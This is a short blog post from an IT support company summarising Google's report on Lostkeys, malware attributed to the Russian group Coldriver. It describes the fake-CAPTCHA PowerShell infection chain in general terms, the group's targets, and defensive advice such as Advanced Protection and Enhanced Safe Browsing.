- About Us
We 365 Admin Support, just simplify your IT problems
Call for a free support. +91 96666 59505Platform Partnership
HIGHLIGHTS
In a concerning development, Google’s Threat Intelligence Group (GTIG) has discovered an advanced malware strain known as Lostkeys, which is associated with the Russian state-sponsored hacking group Coldriver, also referred to as UNC4057, Star Blizzard, and Callisto. According to Google’s findings, Lostkeys has the ability to exfiltrate all files from an infected device while simultaneously relaying vital system information back to the attackers.
This malware strain has manifested in campaigns conducted throughout January, March, and April 2025, revealing a significant increase in Coldriver’s operational capabilities. Previously, Coldriver had focused primarily on credential phishing, targeting NATO governments, non-governmental organizations (NGOs), and former intelligence officials. Now, they have broadened their scope to include direct malware deployment aimed at data theft.
The operation of Lostkeys begins with a sophisticated multi-stage infection sequence. It all starts with a counterfeit CAPTCHA page that deceives users, compelling them to execute PowerShell commands. This initial step fetches subsequent malware stages from a remote server, ultimately leading to the activation of Lostkeys itself. Once deployed, Lostkeys can infiltrate specified directories to steal files, gather and transmit system information, and evade detection through measures such as avoiding execution on virtual machines.
Google has specifically warned that the targets of Coldriver’s campaigns are typically high-profile individuals, including government officials, journalists, think tanks, and NGOs. There is also evidence that the group has targeted individuals with connections to Ukraine.
“Coldriver generally seeks out high-profile targets via personal email addresses or NGO domains. They have a track record of stealing credentials, and once they gain access to an account, they exfiltrate emails and harvest contact lists from the compromised profiles. In particular instances, Coldriver even delivers malware to infiltrate target devices, potentially accessing sensitive files contained within the system,” the company explained in their blog post.
In an effort to counteract this escalating threat, Google has taken proactive measures by adding known malicious websites, domains, and files to its Safe Browsing database. The company has also recommended that users, especially those in high-risk categories, consider enrolling in the Advanced Protection Program. Moreover, they advise that Enhanced Safe Browsing be enabled in Chrome to bolster security against such threats.
This incident highlights the ongoing risk posed by state-sponsored malware and phishing campaigns, particularly against individuals in sensitive positions. The evolution of Coldriver from credential phishing to exploiting malware for data theft marks a troubling shift that could have widespread implications for targeted sectors. Users need to remain vigilant and take necessary precautions to protect their online presence, especially given the increasing sophistication of cyber threats.
For individuals working within NGOs or related fields, it is crucial to ensure that cybersecurity measures are in place. This includes the implementation of strong passwords, two-factor authentication, and awareness training for employees to recognize potential phishing attempts. Resources should also be allocated towards regular security audits and updates to software systems to mitigate vulnerabilities that could be exploited by malicious actors.
As technology continues to advance, the tactics employed by cybercriminals are likely to grow in complexity. Thus, staying informed about the latest cybersecurity threats and practices is essential for safeguarding sensitive data and maintaining the integrity of organizational communications.
